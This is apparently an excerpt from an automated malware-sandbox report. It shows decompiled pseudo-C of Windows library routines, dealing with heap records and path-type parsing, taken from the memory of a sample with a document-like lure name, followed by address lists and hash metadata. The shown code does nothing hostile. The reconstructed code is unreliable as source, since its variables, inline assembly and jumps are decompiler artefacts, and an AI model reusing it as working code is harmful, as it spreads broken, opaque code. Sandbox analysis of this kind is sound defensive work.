											_t494 = ( *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) << 4) +  *((intOrPtr*)(_t528 - 0xc4));
											 *(_t528 - 0x88) = _t427;
											__eflags =  *(_t528 + 0x1c);
											if( *(_t528 + 0x1c) <= 0) {
												L45:
												__eflags =  *(_t528 - 0xb0);
												if( *(_t528 - 0xb0) != 0) {
													_t511 = _t511 + (( *(_t528 - 0x90) & 0x0000ffff) + 0x0000000f & 0xfffffff8);
													__eflags = _t511;
												}
												__eflags = _t475;
												if(_t475 != 0) {
													asm("lock dec dword [ecx+edx*8+0x4]");
													goto L100;
												} else {
													_t494[3] = _t511;
													_t451 =  *(_t528 - 0xa0);
													_t427 = E017E6DE6(_t451, _t511,  *( *[fs:0x18] + 0xf77) & 0x000000ff, _t528 - 0xe0, _t528 - 0xbc);
													 *(_t528 - 0x88) = _t427;
													__eflags = _t427;
													if(_t427 == 0) {
														__eflags = _t511 - 0xfff8;
														if(_t511 <= 0xfff8) {
															__eflags =  *((intOrPtr*)( *(_t528 - 0xa0) + 0x90)) - _t511;
															asm("sbb ecx, ecx");
															__eflags = (_t451 & 0x000000e2) + 8;
														}
														asm("lock dec dword [eax+edx*8+0x4]");
														L100:
														goto L101;
													}
													_t453 =  *(_t528 - 0xa0);
													 *_t494 = _t453;
													_t494[1] = _t427;
													_t494[2] =  *(_t528 - 0xbc);
													 *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) =  *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) + 1;
													 *_t427 =  *(_t453 + 0x24) | _t511;
													 *(_t427 + 4) =  *((intOrPtr*)(_t528 + 0x10));
													 *((short*)(_t427 + 6)) =  *((intOrPtr*)(_t528 + 8));
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													__eflags =  *(_t528 + 0x14);
													if( *(_t528 + 0x14) == 0) {
														__eflags =  *[fs:0x18] + 0xf50;
													}
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													__eflags =  *(_t528 + 0x18);
													if( *(_t528 + 0x18) == 0) {
														_t454 =  *(_t528 - 0x80);
														_t479 =  *(_t528 - 0x78);
														_t327 = 1;
														__eflags = 1;
													} else {
														_t146 = _t427 + 0x50; // 0x50
														_t454 = _t146;
														 *(_t528 - 0x80) = _t454;
														_t382 = 0x18;
														 *_t454 = _t382;
														 *((short*)(_t454 + 2)) = 1;
														_t385 = 0x10;
														 *((short*)(_t454 + 6)) = _t385;
														 *(_t454 + 4) = 0;
														asm("movsd");
														asm("movsd");
														asm("movsd");
														asm("movsd");
														_t327 = 1;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 = 0x68;
														 *(_t528 - 0x78) = _t479;
													}
													__eflags =  *(_t528 - 0x79) - _t327;
													if( *(_t528 - 0x79) == _t327) {
														_t524 = _t479 + _t427;
														_t508 =  *(_t528 - 0x8c);
														 *_t524 = _t508;
														_t373 = 2;
														 *((short*)(_t524 + 2)) = _t373;
														 *((short*)(_t524 + 6)) =  *(_t528 - 0x98);
														 *((short*)(_t524 + 4)) = 0;
														_t167 = _t524 + 8; // 0x8
														E017EF3E0(_t167, _t528 - 0x68,  *(_t528 - 0x98));
														_t529 = _t529 + 0xc;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 =  *(_t528 - 0x78) + (_t508 & 0x0000ffff);
														 *(_t528 - 0x78) = _t479;
														_t380 =  *(_t528 - 0x80);
														__eflags = _t380;
														if(_t380 != 0) {
															_t173 = _t380 + 4;
															 *_t173 =  *(_t380 + 4) | 1;
															__eflags =  *_t173;
														}
														_t454 = _t524;
														 *(_t528 - 0x80) = _t454;
														_t327 = 1;
														__eflags = 1;
													}
													__eflags =  *(_t528 - 0xd4);
													if( *(_t528 - 0xd4) == 0) {
														_t505 =  *(_t528 - 0x80);
													} else {
														_t505 = _t479 + _t427;
														_t523 = 0x10;
														 *_t505 = _t523;
														_t367 = 3;
														 *((short*)(_t505 + 2)) = _t367;
														_t368 = 4;
														 *((short*)(_t505 + 6)) = _t368;
														 *(_t505 + 4) = 0;
														 *((intOrPtr*)(_t505 + 8)) =  *((intOrPtr*)( *[fs:0x30] + 0x1d4));
														_t327 = 1;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 = _t479 + _t523;
														 *(_t528 - 0x78) = _t479;
														__eflags = _t454;
														if(_t454 != 0) {
															_t186 = _t454 + 4;
															 *_t186 =  *(_t454 + 4) | 1;
															__eflags =  *_t186;
														}
														 *(_t528 - 0x80) = _t505;
													}
													__eflags =  *(_t528 - 0x7a) - _t327;
													if( *(_t528 - 0x7a) == _t327) {
														 *(_t528 - 0xd4) = _t479 + _t427;
														_t522 =  *(_t528 - 0x84) & 0x0000ffff;
														E017EF3E0(_t479 + _t427,  *(_t528 - 0x9c), _t522);
														_t529 = _t529 + 0xc;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 =  *(_t528 - 0x78) + _t522;
														 *(_t528 - 0x78) = _t479;
														__eflags = _t505;
														if(_t505 != 0) {
															_t199 = _t505 + 4;
															 *_t199 =  *(_t505 + 4) | 1;
															__eflags =  *_t199;
														}
														_t505 =  *(_t528 - 0xd4);
														 *(_t528 - 0x80) = _t505;
													}
													__eflags =  *(_t528 - 0xa8);
													if( *(_t528 - 0xa8) != 0) {
														_t356 = _t479 + _t427;
														 *(_t528 - 0xd4) = _t356;
														_t462 =  *(_t528 - 0xac);
														 *_t356 = _t462 + 0x0000000f & 0x0000fff8;
														_t485 = 0xc;
														 *((short*)(_t356 + 2)) = _t485;
														 *(_t356 + 6) = _t462;
														 *((short*)(_t356 + 4)) = 0;
														_t211 = _t356 + 8; // 0x9
														E017EF3E0(_t211,  *(_t528 - 0xa8), _t462 & 0x0000ffff);
														E017EFA60((_t462 & 0x0000ffff) + _t211, 0, (_t462 + 0x0000000f & 0x0000fff8) -  *(_t528 - 0xac) - 0x00000008 & 0x0000ffff);
														_t529 = _t529 + 0x18;
														_t427 =  *(_t528 - 0x88);
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t505 =  *(_t528 - 0xd4);
														_t479 =  *(_t528 - 0x78) + ( *_t505 & 0x0000ffff);
														 *(_t528 - 0x78) = _t479;
														_t362 =  *(_t528 - 0x80);
														__eflags = _t362;
														if(_t362 != 0) {
															_t222 = _t362 + 4;
															 *_t222 =  *(_t362 + 4) | 1;
															__eflags =  *_t222;
														}
													}
													__eflags =  *(_t528 - 0xb0);
													if( *(_t528 - 0xb0) != 0) {
														 *(_t479 + _t427) =  *(_t528 - 0x90) + 0x0000000f & 0x0000fff8;
														_t458 = 0xb;
														 *((short*)(_t479 + _t427 + 2)) = _t458;
														 *((short*)(_t479 + _t427 + 6)) =  *(_t528 - 0x90);
														 *((short*)(_t427 + 4 + _t479)) = 0;
														 *(_t528 - 0xb8) = _t479 + 8 + _t427;
														E017EFA60(( *(_t528 - 0x90) & 0x0000ffff) + _t479 + 8 + _t427, 0, ( *(_t528 - 0x90) + 0x0000000f & 0x0000fff8) -  *(_t528 - 0x90) - 0x00000008 & 0x0000ffff);
														_t529 = _t529 + 0xc;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 =  *(_t528 - 0x78) + ( *( *(_t528 - 0x78) + _t427) & 0x0000ffff);
														 *(_t528 - 0x78) = _t479;
														__eflags = _t505;
														if(_t505 != 0) {
															_t241 = _t505 + 4;
															 *_t241 =  *(_t505 + 4) | 1;
															__eflags =  *_t241;
														}
													}
													_t328 =  *(_t528 + 0x1c);
													__eflags = _t328;
													if(_t328 == 0) {
														L87:
														_t329 =  *((intOrPtr*)(_t528 - 0xe0));
														 *((intOrPtr*)(_t427 + 0x10)) = _t329;
														_t455 =  *(_t528 - 0xdc);
														 *(_t427 + 0x14) = _t455;
														_t480 =  *(_t528 - 0xa0);
														_t517 = 3;
														__eflags =  *((intOrPtr*)(_t480 + 0x10)) - _t517;
														if( *((intOrPtr*)(_t480 + 0x10)) != _t517) {
															asm("rdtsc");
															 *(_t427 + 0x3c) = _t480;
														} else {
															 *(_t427 + 0x3c) = _t455;
														}
														 *((intOrPtr*)(_t427 + 0x38)) = _t329;
														_t456 =  *[fs:0x18];
														 *((intOrPtr*)(_t427 + 8)) =  *((intOrPtr*)(_t456 + 0x24));
														 *((intOrPtr*)(_t427 + 0xc)) =  *((intOrPtr*)(_t456 + 0x20));
														_t427 = 0;
														__eflags = 0;
														_t511 = 0x18;
														goto L91;
													} else {
														_t519 =  *((intOrPtr*)(_t528 - 0xc8)) + 0xc;
														__eflags = _t519;
														 *(_t528 - 0x8c) = _t328;
														do {
															_t506 =  *((intOrPtr*)(_t519 - 4));
															_t457 =  *((intOrPtr*)(_t519 - 0xc));
															 *(_t528 - 0xd4) =  *(_t519 - 8);
															_t333 =  *((intOrPtr*)(_t528 - 0xb4));
															__eflags =  *(_t333 + 0x36) & 0x00004000;
															if(( *(_t333 + 0x36) & 0x00004000) != 0) {
																_t334 =  *_t519;
															} else {
																_t334 = 0;
															}
															_t336 = _t334 & 0x000000ff;
															__eflags = _t336;
															_t427 =  *(_t528 - 0x88);
															if(_t336 == 0) {
																_t481 = _t479 + _t506;
																__eflags = _t481;
																 *(_t528 - 0x78) = _t481;
																E017EF3E0(_t479 + _t427, _t457, _t506);
																_t529 = _t529 + 0xc;
															} else {
																_t340 = _t336 - 1;
																__eflags = _t340;
																if(_t340 == 0) {
																	E017EF3E0( *(_t528 - 0xb8), _t457, _t506);
																	_t529 = _t529 + 0xc;
																	 *(_t528 - 0xb8) =  *(_t528 - 0xb8) + _t506;
																} else {
																	__eflags = _t340 == 0;
																	if(_t340 == 0) {
																		__eflags = _t506 - 8;
																		if(_t506 == 8) {
																			 *((intOrPtr*)(_t528 - 0xe0)) =  *_t457;
																			 *(_t528 - 0xdc) =  *(_t457 + 4);
																		}
																	}
																}
															}
															_t339 = 0x10;
															_t519 = _t519 + _t339;
															_t263 = _t528 - 0x8c;
															 *_t263 =  *(_t528 - 0x8c) - 1;
															__eflags =  *_t263;
															_t479 =  *(_t528 - 0x78);
														} while ( *_t263 != 0);
														goto L87;
													}
												}
											} else {
												_t392 =  *( *((intOrPtr*)(_t528 - 0xb4)) + 0x36) & 0x00004000;
												 *(_t528 - 0xa2) = _t392;
												_t469 =  *((intOrPtr*)(_t528 - 0xc8)) + 8;
												__eflags = _t469;
												while(1) {
													 *(_t528 - 0xe4) = _t511;
													__eflags = _t392;
													_t393 = _t427;
													if(_t392 != 0) {
														_t393 =  *((intOrPtr*)(_t469 + 4));
													}
													_t395 = (_t393 & 0x000000ff) - _t427;
													__eflags = _t395;
													if(_t395 == 0) {
														_t511 = _t511 +  *_t469;
														__eflags = _t511;
													} else {
														_t398 = _t395 - 1;
														__eflags = _t398;
														if(_t398 == 0) {
															 *(_t528 - 0x90) =  *(_t528 - 0x90) +  *_t469;
															 *(_t528 - 0xb0) =  *(_t528 - 0xb0) + 1;
														} else {
															__eflags = _t398 == 1;
															if(_t398 == 1) {
																 *(_t528 - 0xa8) =  *(_t469 - 8);
																_t402 =  *_t469 & 0x0000ffff;
																 *(_t528 - 0xac) = _t402;
																_t511 = _t511 + ((_t402 & 0x0000ffff) + 0x0000000f & 0xfffffff8);
															}
														}
													}
													__eflags = _t511 -  *(_t528 - 0xe4);
													if(_t511 <  *(_t528 - 0xe4)) {
														break;
													}
													_t397 =  *(_t528 - 0x88) + 1;
													 *(_t528 - 0x88) = _t397;
													_t469 = _t469 + 0x10;
													__eflags = _t397 -  *(_t528 + 0x1c);
													_t392 =  *(_t528 - 0xa2);
													if(_t397 <  *(_t528 + 0x1c)) {
														continue;
													}
													goto L45;
												}
												_t475 = 0x216;
												 *(_t528 - 0x74) = 0x216;
												goto L45;
											}
										} else {
											asm("lock dec dword [eax+ecx*8+0x4]");
											goto L16;
										}
									}
									_t491 = E01874CAB(_t306, _t528 - 0xa4);
									 *(_t528 - 0x74) = _t491;
									__eflags = _t491;
									if(_t491 != 0) {
										goto L91;
									} else {
										_t474 =  *((intOrPtr*)(_t528 - 0x94));
										goto L20;
									}
								}
								L16:
								 *(_t528 - 0x74) = 0x1069;
								L93:
								_t298 =  *(_t528 - 0xd0) + 1;
								 *(_t528 - 0xd0) = _t298;
								_t474 = _t474 + _t511;
								 *((intOrPtr*)(_t528 - 0x94)) = _t474;
								_t494 = 4;
								__eflags = _t298 - _t494;
								if(_t298 >= _t494) {
									goto L100;
								}
								_t494 =  *(_t528 - 0xcc);
								_t435 = _t298;
								continue;
							}
							__eflags = _t494[2] | _t494[3];
							if((_t494[2] | _t494[3]) == 0) {
								goto L15;
							}
							goto L12;
						}
						__eflags = _t301;
						if(_t301 != 0) {
							goto L92;
						}
						goto L10;
						L92:
						goto L93;
					}
				} else {
					_push(0x57);
					L101:
					return E017FD130(_t427, _t494, _t511);
				}
			}










































































                                                  0x01875ba5
                                                  0x01875baa
                                                  0x01875baf
                                                  0x01875bb4
                                                  0x01875bb6
                                                  0x01875bbc
                                                  0x01875bbe
                                                  0x01875bc4
                                                  0x01875bcd
                                                  0x01875bd3
                                                  0x01875bd6
                                                  0x01875bdc
                                                  0x01875be0
                                                  0x01875be3
                                                  0x01875beb
                                                  0x01875bf2
                                                  0x01875bf8
                                                  0x01875bfe
                                                  0x01875c04
                                                  0x01875c0e
                                                  0x01875c18
                                                  0x01875c1f
                                                  0x01875c25
                                                  0x01875c2a
                                                  0x01875c2c
                                                  0x01875c32
                                                  0x01875c3a
                                                  0x01875c3f
                                                  0x01875c42
                                                  0x01875c48
                                                  0x01875c5b
                                                  0x01875c5b
                                                  0x01875c2c
                                                  0x01875cb7
                                                  0x01875cb9
                                                  0x01875cbf
                                                  0x01875cc2
                                                  0x01875cca
                                                  0x01875ccb
                                                  0x01875ccb
                                                  0x01875cd1
                                                  0x01875cd7
                                                  0x01875cda
                                                  0x01875ce1
                                                  0x01875ce4
                                                  0x01875ce7
                                                  0x01875ced
                                                  0x01875cf3
                                                  0x01875cf9
                                                  0x01875cff
                                                  0x01875d08
                                                  0x01875d0a
                                                  0x01875d0e
                                                  0x01875d10
                                                  0x00000000
                                                  0x00000000
                                                  0x01875d16
                                                  0x01875d1a
                                                  0x00000000
                                                  0x00000000
                                                  0x01875d20
                                                  0x01875d22
                                                  0x01875d25
                                                  0x01875d2f
                                                  0x01875d2f
                                                  0x01875d33
                                                  0x01875d3d
                                                  0x01875d49
                                                  0x01875d4b
                                                  0x00000000
                                                  0x00000000
                                                  0x01875d5a
                                                  0x01875d5d
                                                  0x01875d60
                                                  0x00000000
                                                  0x00000000
                                                  0x01875d66
                                                  0x01875d69
                                                  0x00000000
                                                  0x00000000
                                                  0x01875d6f
                                                  0x01875d6f
                                                  0x01875d73
                                                  0x01875d79
                                                  0x01875d7f
                                                  0x01875d86
                                                  0x01875d95
                                                  0x01875d98
                                                  0x01875dba
                                                  0x01875dcb
                                                  0x01875dce
                                                  0x01875dd3
                                                  0x01875dd6
                                                  0x01875dd8
                                                  0x01875de6
                                                  0x01875dec
                                                  0x01875dee
                                                  0x01875df1
                                                  0x01875df3
                                                  0x0187635a
                                                  0x0187635a
                                                  0x00000000
                                                  0x0187635a
                                                  0x01875dfe
                                                  0x01875e02
                                                  0x01875e05
                                                  0x01875e07
                                                  0x01875e10
                                                  0x01875e13
                                                  0x01875e1b
                                                  0x01875e1c
                                                  0x01875e21
                                                  0x01875e22
                                                  0x01875e23
                                                  0x01875e25
                                                  0x01875e2a
                                                  0x01875e2c
                                                  0x01875e2e
                                                  0x01875e36
                                                  0x01875e39
                                                  0x01875e42
                                                  0x01875e47
                                                  0x01875e4d
                                                  0x01875e54
                                                  0x01875e54
                                                  0x01875e54
                                                  0x01875e2e
                                                  0x01875e5c
                                                  0x01875e5f
                                                  0x01875e62
                                                  0x01875e64
                                                  0x01875e6b
                                                  0x01875e70
                                                  0x01875e7a
                                                  0x01875e7a
                                                  0x01875e7a
                                                  0x01875e6b
                                                  0x01875e7e
                                                  0x01875e7f
                                                  0x01875e7f
                                                  0x01875e81
                                                  0x01875e87
                                                  0x01875e8b
                                                  0x01875e8c
                                                  0x01875e8c
                                                  0x01875e8c
                                                  0x01875e9a
                                                  0x01875e9c
                                                  0x01875ea2
                                                  0x01875ea6
                                                  0x01875f50
                                                  0x01875f50
                                                  0x01875f57
                                                  0x01875f66
                                                  0x01875f66
                                                  0x01875f66
                                                  0x01875f68
                                                  0x01875f6a
                                                  0x018763d0
                                                  0x00000000
                                                  0x01875f70
                                                  0x01875f70
                                                  0x01875f91
                                                  0x01875f9c
                                                  0x01875f9e
                                                  0x01875fa4
                                                  0x01875fa6
                                                  0x0187638c
                                                  0x01876392
                                                  0x018763a1
                                                  0x018763a7
                                                  0x018763af
                                                  0x018763af
                                                  0x018763bd
                                                  0x018763d8
                                                  0x00000000
                                                  0x018763d8
                                                  0x01875fac
                                                  0x01875fb2
                                                  0x01875fb4
                                                  0x01875fbd
                                                  0x01875fc6
                                                  0x01875fce
                                                  0x01875fd4
                                                  0x01875fdc
                                                  0x01875fec
                                                  0x01875fed
                                                  0x01875fee
                                                  0x01875fef
                                                  0x01875ff9
                                                  0x01875ffa
                                                  0x01875ffb
                                                  0x01875ffc
                                                  0x01876000
                                                  0x01876004
                                                  0x01876012
                                                  0x01876012
                                                  0x01876018
                                                  0x01876019
                                                  0x0187601a
                                                  0x0187601b
                                                  0x0187601c
                                                  0x01876020
                                                  0x01876059
                                                  0x0187605c
                                                  0x01876061
                                                  0x01876061
                                                  0x01876022
                                                  0x01876022
                                                  0x01876022
                                                  0x01876025
                                                  0x0187602a
                                                  0x0187602b
                                                  0x01876031
                                                  0x01876037
                                                  0x01876038
                                                  0x0187603e
                                                  0x01876048
                                                  0x01876049
                                                  0x0187604a
                                                  0x0187604b
                                                  0x0187604c
                                                  0x0187604d
                                                  0x01876053
                                                  0x01876054
                                                  0x01876054
                                                  0x01876062
                                                  0x01876065
                                                  0x01876067
                                                  0x0187606a
                                                  0x01876070
                                                  0x01876075
                                                  0x01876076
                                                  0x01876081
                                                  0x01876087
                                                  0x01876095
                                                  0x01876099
                                                  0x0187609e
                                                  0x018760a4
                                                  0x018760ae
                                                  0x018760b0
                                                  0x018760b3
                                                  0x018760b6
                                                  0x018760b8
                                                  0x018760ba
                                                  0x018760ba
                                                  0x018760ba
                                                  0x018760ba
                                                  0x018760be
                                                  0x018760c0
                                                  0x018760c5
                                                  0x018760c5
                                                  0x018760c5
                                                  0x018760c6
                                                  0x018760cd
                                                  0x01876114
                                                  0x018760cf
                                                  0x018760cf
                                                  0x018760d4
                                                  0x018760d5
                                                  0x018760da
                                                  0x018760db
                                                  0x018760e1
                                                  0x018760e2
                                                  0x018760e8
                                                  0x018760f8
                                                  0x018760fd
                                                  0x018760fe
                                                  0x01876102
                                                  0x01876104
                                                  0x01876107
                                                  0x01876109
                                                  0x0187610b
                                                  0x0187610b
                                                  0x0187610b
                                                  0x0187610b
                                                  0x0187610f
                                                  0x0187610f
                                                  0x01876117
                                                  0x0187611a
                                                  0x0187611f
                                                  0x01876125
                                                  0x01876134
                                                  0x01876139
                                                  0x0187613f
                                                  0x01876146
                                                  0x01876148
                                                  0x0187614b
                                                  0x0187614d
                                                  0x0187614f
                                                  0x0187614f
                                                  0x0187614f
                                                  0x0187614f
                                                  0x01876153
                                                  0x01876159
                                                  0x01876159
                                                  0x0187615c
                                                  0x01876163
                                                  0x01876169
                                                  0x0187616c
                                                  0x01876172
                                                  0x01876181
                                                  0x01876186
                                                  0x01876187
                                                  0x0187618b
                                                  0x01876191
                                                  0x01876195
                                                  0x018761a3
                                                  0x018761bb
                                                  0x018761c0
                                                  0x018761c3
                                                  0x018761cc
                                                  0x018761d0
                                                  0x018761dc
                                                  0x018761de
                                                  0x018761e1
                                                  0x018761e4
                                                  0x018761e6
                                                  0x018761e8
                                                  0x018761e8
                                                  0x018761e8
                                                  0x018761e8
                                                  0x018761e6
                                                  0x018761ec
                                                  0x018761f3
                                                  0x01876203
                                                  0x01876209
                                                  0x0187620a
                                                  0x01876216
                                                  0x0187621d
                                                  0x01876227
                                                  0x01876241
                                                  0x01876246
                                                  0x0187624c
                                                  0x01876257
                                                  0x01876259
                                                  0x0187625c
                                                  0x0187625e
                                                  0x01876260
                                                  0x01876260
                                                  0x01876260
                                                  0x01876260
                                                  0x0187625e
                                                  0x01876264
                                                  0x01876267
                                                  0x01876269
                                                  0x01876315
                                                  0x01876315
                                                  0x0187631b
                                                  0x0187631e
                                                  0x01876324
                                                  0x01876327
                                                  0x0187632f
                                                  0x01876330
                                                  0x01876333
                                                  0x0187633a
                                                  0x0187633c
                                                  0x01876335
                                                  0x01876335
                                                  0x01876335
                                                  0x0187633f
                                                  0x01876342
                                                  0x0187634c
                                                  0x01876352
                                                  0x01876355
                                                  0x01876355
                                                  0x01876359
                                                  0x00000000
                                                  0x0187626f
                                                  0x01876275
                                                  0x01876275
                                                  0x01876278
                                                  0x0187627e
                                                  0x0187627e
                                                  0x01876281
                                                  0x01876287
                                                  0x0187628d
                                                  0x01876298
                                                  0x0187629c
                                                  0x018762a2
                                                  0x0187629e
                                                  0x0187629e
                                                  0x0187629e
                                                  0x018762a7
                                                  0x018762a7
                                                  0x018762aa
                                                  0x018762b0
                                                  0x018762f0
                                                  0x018762f0
                                                  0x018762f2
                                                  0x018762f8
                                                  0x018762fd
                                                  0x018762b2
                                                  0x018762b2
                                                  0x018762b2
                                                  0x018762b5
                                                  0x018762dd
                                                  0x018762e2
                                                  0x018762e5
                                                  0x018762b7
                                                  0x018762b8
                                                  0x018762bb
                                                  0x018762bd
                                                  0x018762c0
                                                  0x018762c4
                                                  0x018762cd
                                                  0x018762cd
                                                  0x018762c0
                                                  0x018762bb
                                                  0x018762b5
                                                  0x01876302
                                                  0x01876303
                                                  0x01876305
                                                  0x01876305
                                                  0x01876305
                                                  0x0187630c
                                                  0x0187630c
                                                  0x00000000
                                                  0x0187627e
                                                  0x01876269
                                                  0x01875eac
                                                  0x01875ebb
                                                  0x01875ebe
                                                  0x01875ecb
                                                  0x01875ecb
                                                  0x01875ece
                                                  0x01875ece
                                                  0x01875ed4
                                                  0x01875ed7
                                                  0x01875ed9
                                                  0x01875edb
                                                  0x01875edb
                                                  0x01875ee1
                                                  0x01875ee1
                                                  0x01875ee3
                                                  0x01875f20
                                                  0x01875f20
                                                  0x01875ee5
                                                  0x01875ee5
                                                  0x01875ee5
                                                  0x01875ee8
                                                  0x01875f11
                                                  0x01875f18
                                                  0x01875eea
                                                  0x01875eea
                                                  0x01875eed
                                                  0x01875ef2
                                                  0x01875ef8
                                                  0x01875efb
                                                  0x01875f0a
                                                  0x01875f0a
                                                  0x01875eed
                                                  0x01875ee8
                                                  0x01875f22
                                                  0x01875f28
                                                  0x00000000
                                                  0x00000000
                                                  0x01875f30
                                                  0x01875f31
                                                  0x01875f37
                                                  0x01875f3a
                                                  0x01875f3d
                                                  0x01875f44
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x01875f46
                                                  0x01875f48
                                                  0x01875f4d
                                                  0x00000000
                                                  0x01875f4d
                                                  0x01875dda
                                                  0x01875ddf
                                                  0x00000000
                                                  0x01875ddf
                                                  0x01875dd8
                                                  0x01875da7
                                                  0x01875da9
                                                  0x01875dac
                                                  0x01875dae
                                                  0x00000000
                                                  0x01875db4
                                                  0x01875db4
                                                  0x00000000
                                                  0x01875db4
                                                  0x01875dae
                                                  0x01875d88
                                                  0x01875d8d
                                                  0x01876363
                                                  0x01876369
                                                  0x0187636a
                                                  0x01876370
                                                  0x01876372
                                                  0x0187637a
                                                  0x0187637b
                                                  0x0187637d
                                                  0x00000000
                                                  0x00000000
                                                  0x0187637f
                                                  0x01876385
                                                  0x00000000
                                                  0x01876385
                                                  0x01875d38
                                                  0x01875d3b
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x01875d3b
                                                  0x01875d27
                                                  0x01875d29
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x01876360
                                                  0x00000000
                                                  0x01876360
                                                  0x01875c10
                                                  0x01875c10
                                                  0x018763da
                                                  0x018763e5
                                                  0x018763e5

                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.346919106.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: true
                                                  • Associated: 00000004.00000002.348742770.000000000189B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000004.00000002.348772341.000000000189F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_1780000_Technical Specifications & Drawings.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 25a16a7cefb93bc732ef87adb9415dfedd548531fb3ec733a67218f9169eda94
                                                  • Instruction ID: 9771333deee99479cd2b4da13564b013ac13bd8b2da58ae1ce6a2d1f72b94664
                                                  • Opcode Fuzzy Hash: 25a16a7cefb93bc732ef87adb9415dfedd548531fb3ec733a67218f9169eda94
                                                  • Instruction Fuzzy Hash: C2423C75900619CFEB25CF68C884BA9BBB1FF49304F1481AAD94DEB242E774DA85CF50
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 017C4120 Relevance: .4, Instructions: 444COMMONCrypto
                                                  Download Yara Rule
                                                  C-Code - Quality: 92%
                                                  			E017C4120(signed char __ecx, signed short* __edx, signed short* _a4, signed int _a8, signed short* _a12, signed short* _a16, signed short _a20) {
				signed int _v8;
				void* _v20;
				signed int _v24;
				char _v532;
				char _v540;
				signed short _v544;
				signed int _v548;
				signed short* _v552;
				signed short _v556;
				signed short* _v560;
				signed short* _v564;
				signed short* _v568;
				void* _v570;
				signed short* _v572;
				signed short _v576;
				signed int _v580;
				char _v581;
				void* _v584;
				unsigned int _v588;
				signed short* _v592;
				void* _v597;
				void* _v600;
				void* _v604;
				void* _v609;
				void* _v616;
				void* __ebx;
				void* __edi;
				void* __esi;
				unsigned int _t161;
				signed int _t162;
				unsigned int _t163;
				void* _t169;
				signed short _t173;
				signed short _t177;
				signed short _t181;
				unsigned int _t182;
				signed int _t185;
				signed int _t213;
				signed int _t225;
				short _t233;
				signed char _t234;
				signed int _t242;
				signed int _t243;
				signed int _t244;
				signed int _t245;
				signed int _t250;
				void* _t251;
				signed short* _t254;
				void* _t255;
				signed int _t256;
				void* _t257;
				signed short* _t260;
				signed short _t265;
				signed short* _t269;
				signed short _t271;
				signed short** _t272;
				signed short* _t275;
				signed short _t282;
				signed short _t283;
				signed short _t290;
				signed short _t299;
				signed short _t307;
				signed int _t308;
				signed short _t311;
				signed short* _t315;
				signed short _t316;
				void* _t317;
				void* _t319;
				signed short* _t321;
				void* _t322;
				void* _t323;
				unsigned int _t324;
				signed int _t325;
				void* _t326;
				signed int _t327;
				signed int _t329;

				_t329 = (_t327 & 0xfffffff8) - 0x24c;
				_v8 =  *0x189d360 ^ _t329;
				_t157 = _a8;
				_t321 = _a4;
				_t315 = __edx;
				_v548 = __ecx;
				_t305 = _a20;
				_v560 = _a12;
				_t260 = _a16;
				_v564 = __edx;
				_v580 = _a8;
				_v572 = _t260;
				_v544 = _a20;
				if( *__edx <= 8) {
					L3:
					if(_t260 != 0) {
						 *_t260 = 0;
					}
					_t254 =  &_v532;
					_v588 = 0x208;
					if((_v548 & 0x00000001) != 0) {
						_v556 =  *_t315;
						_v552 = _t315[2];
						_t161 = E017DF232( &_v556);
						_t316 = _v556;
						_v540 = _t161;
						goto L17;
					} else {
						_t306 = 0x208;
						_t298 = _t315;
						_t316 = E017C6E30(_t315, 0x208, _t254, _t260,  &_v581,  &_v540);
						if(_t316 == 0) {
							L68:
							_t322 = 0xc0000033;
							goto L39;
						} else {
							while(_v581 == 0) {
								_t233 = _v588;
								if(_t316 > _t233) {
									_t234 = _v548;
									if((_t234 & 0x00000004) != 0 || (_t234 & 0x00000008) == 0 &&  *((char*)( *[fs:0x30] + 3)) < 0) {
										_t254 = L017C4620(_t298,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t316);
										if(_t254 == 0) {
											_t169 = 0xc0000017;
										} else {
											_t298 = _v564;
											_v588 = _t316;
											_t306 = _t316;
											_t316 = E017C6E30(_v564, _t316, _t254, _v572,  &_v581,  &_v540);
											if(_t316 != 0) {
												continue;
											} else {
												goto L68;
											}
										}
									} else {
										goto L90;
									}
								} else {
									_v556 = _t316;
									 *((short*)(_t329 + 0x32)) = _t233;
									_v552 = _t254;
									if(_t316 < 2) {
										L11:
										if(_t316 < 4 ||  *_t254 == 0 || _t254[1] != 0x3a) {
											_t161 = 5;
										} else {
											if(_t316 < 6) {
												L87:
												_t161 = 3;
											} else {
												_t242 = _t254[2] & 0x0000ffff;
												if(_t242 != 0x5c) {
													if(_t242 == 0x2f) {
														goto L16;
													} else {
														goto L87;
													}
													goto L101;
												} else {
													L16:
													_t161 = 2;
												}
											}
										}
									} else {
										_t243 =  *_t254 & 0x0000ffff;
										if(_t243 == 0x5c || _t243 == 0x2f) {
											if(_t316 < 4) {
												L81:
												_t161 = 4;
												goto L17;
											} else {
												_t244 = _t254[1] & 0x0000ffff;
												if(_t244 != 0x5c) {
													if(_t244 == 0x2f) {
														goto L60;
													} else {
														goto L81;
													}
												} else {
													L60:
													if(_t316 < 6) {
														L83:
														_t161 = 1;
														goto L17;
													} else {
														_t245 = _t254[2] & 0x0000ffff;
														if(_t245 != 0x2e) {
															if(_t245 == 0x3f) {
																goto L62;
															} else {
																goto L83;
															}
														} else {
															L62:
															if(_t316 < 8) {
																L85:
